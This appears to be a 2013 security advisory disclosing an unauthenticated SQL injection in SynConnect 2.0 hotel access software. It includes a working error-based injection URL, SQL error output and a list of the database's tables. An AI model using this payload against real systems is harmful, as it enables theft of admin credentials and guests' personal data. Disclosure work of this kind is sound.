SynConnect PMS SQL Injection Vulnerability

[bhadresh.k.patel () cyberoam com]

Title:
====

SynConnect - SQL Injection vulnerability


Credit:
======

Name: Bhadresh Patel
Company/affiliation: Cyberoam Technologies Private Limited
Website: www.cyberoam.com


CVE:
=====


Date:
====

01-03-2013

CRD:
====

CRD-2013-01

Vendor:
======

Synchroweb Technology is a provider of application software, hardware and other innovative enterprise technology. They 
strive in development, deployment, and management of Linux and open source solutions for Internet infrastructure 
ranging from embedded devices to secure data center facilities throughout the Asia market.

Product:
=======

SynConnect is a PMS (Property management software) product of Synchroweb which provides High Speed Internet Access to 
Hotels, Airport lounge, Resort, conference centers, universities, etc.

Product link: http://www.synchroweb.com/prod_syn.php

Abstract:
=======

Cyberoam Vulnerability Research Team discovered a SQL Injection Vulnerability on the SynConnect is a PMS software.
Report-Timeline:
============
21-03-2013: Vendor notification
00-00-2013: Vendor Response/Feedback
00-00-2013: Vendor Fix/Patch
00-00-2013: Public or Non-Public Disclosure


Affected Version:
=============

Ver 2.0

Exploitation-Technique:
===================

Remote

Severity Rating:
===================

7.3 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C/CDP:MH/TD:M/CR:H/IR:H/AR:H)

Details:
=======

There is an error-based SQL injection vulnerability in SysConnect's index.php which allows attacker to steal full 
database including Master admin credentials and Guest's personal confidential information.

Further, login to admin portal gives attacker an overall control of guest accounts. Attacker can impersonate his 
identity by stealing guest's login credential.

SynConnect also offers easy payment internet access via prepaid packages or payment gateway from internet such as World 
Pay but, I have not checked vulnerability coverage in this area.

Vulnerable Module(s):

index.php?func=logoff&loginid=

Vulnerable Parameter:

loginid

--------------SQL Error Logs------------

Fatal error: SQL-statement failed: select * from user_master,group_master,package_master where 
user_master.userid='1011' AND (SELECT 8975 FROM(SELECT COUNT(*),CONCAT((SELECT MID((IFNULL(CAST(schema_name AS 
CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),FLOOR(RAND(0)*2))x FROM 
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bhdresh'='bhdresh' and user_master.groupid=group_master.groupid 
and user_master.pkgid=package_master.pkgid
MySQL said Duplicate entry 'synconnect1' for key 'group_key' (1062).

----------------------------------------------

Caveats / Prerequisites:
======================

No Prerequisites

Proof Of Concept:
================

Vulnerability can be exploited by remote attacker without authentication. For demonstration or reproduce ...

http://localhost/index.php?func=logoff&loginid=1011' AND (SELECT 8975 FROM(SELECT COUNT(*),CONCAT((SELECT 
MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),FLOOR(RAND(0)*2))x FROM 
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bhdresh'='bhdresh


--- SQL Access Log ---

http://localhost/index.php?func=logoff&loginid=1011' AND (SELECT 8975 FROM(SELECT COUNT(*),CONCAT((SELECT 
MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),FLOOR(RAND(0)*2))x FROM 
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bhdresh'='bhdresh

Database synconnect1 has following list of tables,

[43 tables]

+---------------------+

| 1stlogin |

| accesslevel_detail |

| accesslevel_master |

| admin_master |

| adminlog |

| bandwidth_master |

| bandwidth_qos |

| bandwidth_tc_master |

| cms_users |

| device_detail |

| device_master |

| dhcp |

| fwblock |

| group_master |

| group_package |

| group_useramr |

| invoice_master |

| last_date |

| layer7_master |

| mac_master |

| module_detail |

| module_master |

| network |

| nms |

| nms_log |

| package_check |

| package_master |

| pms_host |

| pms_link_handshake |

| pms_payment |

| pms_vip |

| ports |

| prepaid_id |

| protos |

| proxy_master |

| publicip_master |

| qos_master |

| sessions |

| tracking_prepaid |

| usage_master |

| user_actavg |

| user_browserinfo |

| user_connect |

+-------------------


Risk:
=====

The security risk of the remote sql injection vulnerability is estimated as critical.

Creditee:
=======

Bhadresh Patel - Cyberoam Security Research Team

Disclaimer:
===========

The information provided in this advisory is provided as it is without any warranty. Any modified copy or reproduction, 
including partially usages, of this file requires authorization from Cyberoam Vulnerability Research Team. Permission 
to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of 
other media, are reserved by Cyberoam Vulnerability Research Team.


The first attempt at contact will be through any appropriate contacts or formal mechanisms listed on the vendor Web 
site, or by sending an e-mail with the pertinent information about the vulnerability. Simultaneous with the vendor 
being notified, Cyberoam may distribute vulnerability protection filters to its customers' IPS devices through the IPS 
upgrades.

If a vendor fails to respond after five business days, Cyberoam Vulnerability Research Team may issue a public advisory 
disclosing its findings fifteen business days after the initial contact.

If a vendor response is received within the timeframe outlined above, Cyberoam Vulnerability Research Team will allow 
the vendor 6-months to address the vulnerability with a patch. At the end of the deadline if a vendor is not responsive 
or unable to provide a reasonable statement as to why the vulnerability is not fixed, the Cyberoam Vulnerability 
Research Team will publish a limited advisory to enable the defensive community to protect the user. We believe that by 
doing so the vendor will understand the responsibility they have to their customers and will react appropriately.

Cyberoam Vulnerability Research Team will make every effort to work with vendors to ensure they understand the 
technical details and severity of a reported security flaw. If a product vendor is unable to, or chooses not to, patch 
a particular security flaw, Cyberoam Vulnerability Research Team will offer to work with that vendor to publicly 
disclose the flaw with some effective workarounds.

Before public disclosure of a vulnerability, Cyberoam Vulnerability Research Team may share technical details of the 
vulnerability with other security vendors who are in a position to provide a protective response to a broader user base.